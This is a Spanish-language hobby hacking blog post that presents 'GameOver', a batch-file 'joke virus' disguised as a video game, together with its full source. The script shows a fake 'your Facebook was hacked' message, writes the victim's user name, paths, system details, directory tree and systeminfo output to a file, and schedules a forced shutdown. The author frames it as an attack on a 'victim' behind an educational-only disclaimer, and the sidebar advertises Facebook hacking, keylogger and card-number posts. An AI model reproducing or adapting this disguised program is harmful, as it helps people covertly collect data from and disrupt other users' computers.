㊜Suscribete!!! Quieres seguir este blog? Participa en el sitio

Selecciona tu idioma

Virus GameOver desarrollado en cmd


Un virus es un software que tiene por objetivo alterar el funcionamiento normal del ordenador, sin el permiso o el conocimiento del usuario. Los virus, habitualmente, reemplazan archivos ejecutables por otros infectados con el código de este. Los virus pueden destruir, de manera intencionada, los datos almacenados en una computadora, aunque también existen otros más inofensivos, que solo producen molestias.
Los virus informáticos tienen básicamente la función de propagarse a través de un software, son muy nocivos y algunos contienen además una carga dañina (payload) con distintos objetivos, desde una simple broma hasta realizar daños importantes en los sistemas, o bloquear las redes informáticas generando tráfico El funcionamiento de un virus informático es conceptualmente simple. Se ejecuta un programa que está infectado, en la mayoría de las ocasiones, por desconocimiento del usuario.



GameOver
Usando solo comandos de cmd "bat" podemos hacer diferentes tipos de virus, troyanos,gusanos etc.
es una aplicación que tiene los iconos de un vídeo juego de pc que simula que fue hackeado  su facebook, y apaga la maquina una vez que la victima lo ejecute luego extrae todos los datos he información de la pc de nuestra victimas esta desarrollado en bat , es un virus broma podemos observar que los virus pueden estar disfrazado sin que nos demos cuenta a la hora de ejecutar un programa..

algunos comando que nos ayudara a obtener mas datos de la pc de nuestra victima.
  %USERNAME%
  %USERPROFILE%
  %ALLUSERSPROFILE%
  %APPDATA%
  %COMMONPROGRAMFILES%
  %CMDCMDLINE%
  %CMDEXTVERSION%
  %COMPUTERNAME%
  %COMSPEC%
  %DATE%
  %ERRORLEVEL%
  %HOMEDRIVE%
  %HOMEPATH%
  %LOGONSERVER%
  %LOCALAPPDATA%
Nuestro virus esta hecho para usuarios amante a los vídeos juegos una mas de la manera que podemos ser atacados
en otra ocasión presentare un virus mas avanzado.


Código

echo    %USERNAME% Tu Facebook fue hackeado Fecha:%date% Hora:%Time% %random%
echo.  ::----------------------------------------------------------------::
echo.%USERNAME%>>Game.txt 
echo.%USERPROFILE%>>Game.txt 
echo.%ALLUSERSPROFILE%>>Game.txt 
echo.%APPDATA%>>Game.txt 
echo.%COMMONPROGRAMFILES%>>Game.txt 
echo.%CMDCMDLINE%>>Game.txt 
echo.%CMDEXTVERSION%>>Game.txt 
echo.%COMPUTERNAME%>>Game.txt 
echo.%COMSPEC%>>Game.txt 
echo.%DATE%>>Game.txt 
echo.%ERRORLEVEL%>>Game.txt 
echo.%HOMEDRIVE%>>Game.txt 
echo.%HOMEPATH%>>Game.txt 
echo.%LOGONSERVER%>>Game.txt 
echo.%LOCALAPPDATA%>>Game.txt 
echo.%NUMBER_OF_PROCESSORS%>>Game.txt 
echo.%OS%>>Game.txt 
echo.%PATH%>>Game.txt 
echo.%PATHEXT%>>Game.txt 
echo.%PROCESSOR_ARCHITECTURE%>>Game.txt 
echo.%PROCESSOR_IDENTIFIER% >>Game.txt 
echo.%PROCESSOR_LEVEL% >>Game.txt 
echo.%PROCESSOR_REVISION%>>Game.txt 
echo.%PROGRAMDATA% >>Game.txt 
echo.%PROGRAMFILES% >>Game.txt 
echo.%PSModulePath% >>Game.txt 
echo.%PUBLIC% >>Game.txt 
echo.%RANDOM% >>Game.txt 
echo.%SYSTEMDRIVE% >>Game.txt 
echo.%SYSTEMROOT% >>Game.txt 
echo.%TEMP% %TMP% >>Game.txt 
echo.%TIME% >>Game.txt 
echo.%USERNAME% >>Game.txt 
echo.%USERPROFILE% >>Game.txt 
echo.%WINDIR% >>Game.txt 
echo.%ALLUSERSPROFILE% >>Game.txt 
echo.%APPDATA% >>Game.txt 
echo.%CLIENTNAME% >>Game.txt 
echo.%CommonProgramFiles%>>Game.txt 
echo.%COMPUTERNAME% >>Game.txt 
echo.%ComSpec% >>Game.txt 
echo.%HOMEDRIVE% y %SystemDrive% >>Game.txt 
echo.%HOMEPATH% >>Game.txt 
echo.%Path% >>Game.txt 
echo.%PATHEXT% >>Game.txt 
echo.%ProgramFiles% >>Game.txt 
echo.%SystemRoot% y %Windir%>>Game.txt 
echo.%TEMP% y %TMP% >>Game.txt 
echo.%USERNAME% >>Game.txt 
echo.%USERPROFILE%>>Game.txt
::cd %USERPROFILE%
tree>>Game.txt
systeminfo>>Game.txt
shutdown -s -t 360 -c "%USERNAME% Tu Facebook fue hackeado Fecha:%date% Hora:%Time%"
goto menu


Blog 


Mega

github



ADVERTENCIA: NO INTENTE HACER UN ATAQUE SIN EL PERMISO DE PROPIETARIO DEL SITIO WEB. ES UN PROPÓSITO EDUCATIVO SOLAMENTE. NO ES RESPONSABLE DE NINGUN TIPO DE PROBLEMA ILEGAL.
PERMANECE LEGAL. GRACIAS!
Si tienes algún problema, deja un comentario.




㊜Luishiño
Hola soy Luishiño estudio la carrera de ing. sistemas y este es mi Blog personal aquí es donde me gusta escribir sobre temas que en su momento me interesan. Aveces sobre mi vida personal y principalmente cosas de programación ,desarrollo web.Aplicaciones,Software, programas que yo mismo las desarrollo y cosas básicas de informática.⚠ Nadie es como tú y ese es tú súper poder ¯\(°_o)/¯ Sigue mi blog

Quiero soñar , déjame soñar.


Comentarios

㊜Luishiño

★ ★ ★ ★ ★

Hola soy ぎLuishiño y este es mi Blog personal... 

Me considero un joven emprendedor,curioso,creativo,alegre y confiable,siempre buscando la manera de mejorar como amigo y persona . Estudio la carrera de ing. sistemas aquí es donde me gusta escribir sobre temas que en su momento me interesan. Aveces sobre mi vida personal y principalmente cosas de programación, desarrollo web, Aplicaciones, Software, programas que yo mismo las desarrollo y cosas básicas de informática.

El cibernauta no es sólo un navegante, es además un navegante solitario.
La era de los Hackers.

Sad Song We The Kings ft Elena Coats AMV sub español H&L
0:36 |━━●────────| 4:17
⇆ㅤㅤㅤㅤ◁ㅤㅤ❚❚ㅤㅤ▷ㅤ

⚠ Nadie es como tú y ese es tú súper poder
¯\(°_o)/¯ Sigue mi blog

↪Sígueme en las redes sociales↩

Si tienes algún dudas, deja un comentario¿Ha quedado contestada su pregunta? Comparte tu Opinión

Estreno


¿Que es un servidor proxy? Es un programa o dispositivo que intercepta las conexiones de red que un cliente hace un servidor remoto. Esta definición de servidor proxy igual no aclara mucho a la mayoría, por eso voy a tratar de hacer una definición menos técnica pero que cualquiera pueda entender. Un servidor proxy es como un intermediario entre nosotros (el cliente) y el vendedor (el servidor remoto). El proxy en esta función de intermediario puede realizar muchas funciones, como por ejemplo ocultar nuestra IP, operaciones de cache.

Mira este video y sorprendete


"Es tiempo que te preguntes, si eres libre y si te gusta como ellos te obligan a vivir."

Tu y Las Redes Sociales

Tu y Las Redes Sociales

Publicada por Servicio Técnico "The Seven Codes " en Martes, 5 de diciembre de 2019


Entradas populares de este blog

Sockberus Autentificación de proxys

Instalar Metasploit-Framework En Android Con Termux

USB File Resc eliminar virus de accesos directos, recycler y otros malware de tus unidades usb

Descargar aplicación Betflix gratis

Vulnerabilidad en facebook hackear con xploitz parte II

Pantalla azul windows con el virus Google Trojan "broma"

Droid Jack control sobre los dispositivos Android

Método de extrapolación Sofia para tarjetas de crédito

¿Qué es un xploitz? Vulnerabilidad en facebook hackear parte I

¿Qué es Doxing?

Entradas populares de este blog

USB File Resc eliminar virus de accesos directos, recycler y otros malware de tus unidades usb

Sockberus Autentificación de proxys

Vulnerabilidad en facebook hackear con xploitz parte II

¿Qué es un xploitz? Vulnerabilidad en facebook hackear parte I

Programa Revealer Keylogger Pro

Social




Entradas populares

Ofertas y Descuentos

Libros

by @Luishiño! Publicado en abril 14, 2019

Hackear con ataque de diccionario fuerza bruta | Facebook

$5.99

Libros

by @Luishiño! Publicado en abril 14, 2019

Ingeniería inversas hackeando Aplicaciones de Android | apk infect

$5.99

By Blog

Chat-hacking

Únete al chat

QR Donate

ads